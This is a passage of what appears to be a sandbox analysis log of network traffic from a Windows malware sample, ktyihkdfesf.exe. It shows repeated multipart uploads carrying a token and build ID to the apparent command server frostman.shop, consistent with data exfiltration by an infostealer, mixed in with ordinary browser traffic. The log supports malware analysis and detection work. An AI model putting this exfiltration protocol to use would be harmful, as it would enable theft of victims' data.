User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49820 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:30 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------T2DB1DBIMOZU3EU3O890Cont
2024-12-20 06:31:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49823 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:31 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:31 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 44 42 31 44 42 49 4d 4f 5a 55 33 45 55 33 4f 38 39 30 0d 0a 43 6f 6e 74
Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------T2DB1DBIMOZU3EU3O890Cont
2024-12-20 06:31:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.6 | 49841 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:36 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a
Data Ascii: CNT 1 CON 305MS-CV: jWSlmiSnMU+xBn1Q.1Context: 84b616bffe2f7cc4
2024-12-20 06:31:36 UTC | 249 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:31:36 UTC | 1084 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: jWSlmiSnMU+xBn1Q.2Context: 84b616bffe2f7cc4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:31:36 UTC | 218 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 57 53 6c 6d 69 53 6e 4d 55 2b 78 42 6e 31 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 62 36 31 36 62 66 66 65 32 66 37 63 63 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
Data Ascii: BND 3 CON\WNS 0 197MS-CV: jWSlmiSnMU+xBn1Q.3Context: 84b616bffe2f7cc4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-20 06:31:37 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
Data Ascii: 202 1 CON 58
2024-12-20 06:31:37 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 4a 52 73 6a 62 74 6a 44 6e 6b 32 31 35 51 66 42 62 38 6b 30 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
Data Ascii: MS-CV: JRsjbtjDnk215QfBb8k0QA.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 49854 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:37 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:37 UTC | 3165 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74
Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------UAS0ZU3EUA1NYMY58GLXCont
2024-12-20 06:31:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 49865 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:38 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XLFCJM79RI58YMYUAAS2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:38 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 0d 0a 43 6f 6e 74
Data Ascii: ------XLFCJM79RI58YMYUAAS2Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------XLFCJM79RI58YMYUAAS2Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------XLFCJM79RI58YMYUAAS2Cont
2024-12-20 06:31:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
36 | 192.168.2.6 | 49878 | 162.159.61.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:39 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-20 06:31:39 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:39 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 20 Dec 2024 06:31:39 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f4d97386aff5e74-EWR
alt-svc: h3=":443"; ma=86400
2024-12-20 06:31:39 UTC | 468 | IN | Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 49880 | 162.159.61.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:39 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-20 06:31:39 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:39 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 20 Dec 2024 06:31:39 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f4d9738690142e9-EWR
alt-svc: h3=":443"; ma=86400
2024-12-20 06:31:39 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 49879 | 172.64.41.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:39 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-20 06:31:39 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:39 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 20 Dec 2024 06:31:39 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f4d97386c3b4405-EWR
alt-svc: h3=":443"; ma=86400
2024-12-20 06:31:39 UTC | 468 | IN | Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 49870 | 142.250.181.65 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:39 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-20 06:31:40 UTC | 570 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC6ap6mNg0Hrw4MtMT8Ug49sMHZd2KZOx4D3WSOxG8DdznHqccDZ3EzB8t1i9o_OOP9MacNJios
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Thu, 19 Dec 2024 15:58:14 GMT
Expires: Fri, 19 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 52405
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 49886 | 162.159.61.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 49887 | 172.64.41.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.6 | 49888 | 162.159.61.3 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:40 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 49889 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:40 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----4WT2VKNOZMO8QIWT2VSR
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 68733
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-20 06:31:40 UTC | 16355 | OUT | Data Ascii:
------4WT2VKNOZMO8QIWT2VSR
Content-Disposition: form-data; name="token"

889f5f40738c5dc3f18f9676ef06948f
------4WT2VKNOZMO8QIWT2VSR
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------4WT2VKNOZMO8QIWT2VSR
Cont
2024-12-20 06:31:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 49913 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:42 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:42 UTC | 16355 | OUT | Data Ascii:
------R1DBSJMYMYM7QI5FCJM7
Content-Disposition: form-data; name="token"

889f5f40738c5dc3f18f9676ef06948f
------R1DBSJMYMYM7QI5FCJM7
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------R1DBSJMYMYM7QI5FCJM7
Cont
2024-12-20 06:31:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 49917 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:44 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5PZCTRI58YM7QQ1N7GVK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
